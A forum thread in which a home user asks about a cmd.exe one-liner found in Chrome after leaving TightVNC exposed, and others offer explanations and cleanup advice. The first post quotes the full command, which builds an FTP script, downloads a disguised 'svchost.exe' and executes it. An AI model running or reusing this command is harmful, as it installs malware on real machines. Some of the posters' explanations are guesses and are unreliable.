Google Chrome

[Robert Munch]

Can someone explain this? I found this on my home desktop computer on google chrome when I stepped away from my computer for a few hours. Was my computer hacked somehow and how could have this occurred?

systemroot%\system32\cmd.exe cmd /c echo open 127.0.0.1 21 >> ik &echo user owned suckdicky >> ik &echo binari >> ik &echo get svchost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svchost.exe &exit

No cmd box prompt occurred this was in my google chrome google search bar as a "result". I live by myself so nobody did this as a prank while I was away.

 

[Robert Munch]

Seems to be VNC related. I do use TightVNC to remotely connect to my machine from time to time.

Found an interesting article here http://arstechnica.com/civis/viewtopic.php?f=10&t=215528

 

[RebateMonger]

Here's a year-old thread nearly identical to yours:

http://ubuntuforums.org/archive/index.php/t-1244618.html

If it was my computer, I'd rebuild it from scratch or restore it from image backups. And I'd be sure that any remote access software was protected with a very long password, that there's a router between the Internet and the PC, and be very careful about any software that gets run or installed.

"IK" is likely a Keylogger program. It stands for "invisible keylogger". It looks like it's being used here to remotely type ftp commands.

No cmd box prompt occurred this was in my google chrome google search bar as a "result".

A quick check and it seems that some commands can be run from the Chrome address bar. I don't know how extensive this is or if other browsers can do this.

 

[Robert Munch]

From what I understand it seems the invader tried to delete my svchost.exe as it was referencing 127.0.0.1 21. I was also DMZ'd during this time with TightVNC running. When I relaunched VNC I noticed the admin password was removed including the login password to access the machine. Some sort of brute force attack maybe.

I'm not sure if infact this file is removed and i'm running on Win7 if that makes a difference. I tried to check the vncviewer.log and noticed it was at 0kb with it enabled. I've had it running for the past few days. I'm not sure how to locate an IP address from this attack.

Found another interesting article http://www.hellboundhackers.org/forum/a_bothuman_tryed_connecting_to_my_vncserver-14-11285_0.html regarding these types of attacks.